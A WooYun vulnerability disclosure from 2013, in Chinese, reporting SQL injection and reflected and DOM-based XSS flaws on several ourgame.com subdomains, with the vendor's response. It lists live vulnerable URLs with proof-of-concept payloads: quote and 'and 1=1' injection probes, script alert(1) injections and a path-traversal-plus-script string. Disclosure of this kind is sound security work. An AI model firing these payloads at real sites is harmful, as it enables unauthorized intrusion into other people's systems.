漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-022118
漏洞标题:联众世界分站两sql注射+xss大礼包
相关厂商:联众世界
漏洞作者: 梧桐雨
提交时间:2013-04-19 08:53
修复时间:2013-04-24 08:54
公开时间:2013-04-24 08:54
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-04-19: 细节已通知厂商并且等待厂商处理中
2013-04-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
过滤不严谨导致的sql注射+xss
详细说明:
检测了一段时间了,攒在手里。一次性发了吧,给厂商预个警。
sql注射1:
http://bridge.ourgame.com/ladder/bridge/bridge_teamlist.asp?tid=1
http://bridge.ourgame.com/ladder/bridge/bridge_teamlist.asp?tid=1'
sql注射2:
http://glclub.ourgame.com/ladder/bridge_fee/gamelist_team.asp?tid=75
通过and 1=1 and 1=2判断。如图
反射型xss:(斟酌着来修复,有的不严重就忽略哈)
http://jh.ourgame.com/userinfo/userinfo.aspx?username="></iframe><script>alert(1)</script>
http://auth.ourgame.com/graphgamepassport!login.do?game=klsg&parent="/><script>alert(1)</script>&nexturl=
http://oldbbs.ourgame.com/msg/bbs_msg.asp?reg=1&msgID=50002&Subject_ID=615&BBs_ID=""/><script>alert(1)</script>
http://hr.ourgame.com/templates/index/iframe_query.jsp?src=../../../../../../"></iframe><script>alert(1)</script>
有的涉及到用户交互了。例如:
auth.ourgame.com以及oldbbs.ourgame.com两个子站等。
DOMXSS:flash小游戏
http://flash.ourgame.com/game/FPBCHMON?fromwhere=dt%22%0aalert(1)//
暂时就发现这些
漏洞证明:
见详细说明
修复方案:
该过滤的过滤,该转义的转义吧。。。厂商比我更清楚了。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-04-24 08:54
厂商回复:
漏洞Rank:8 (WooYun评价)
最新状态:
2013-04-24:多谢,已经修复!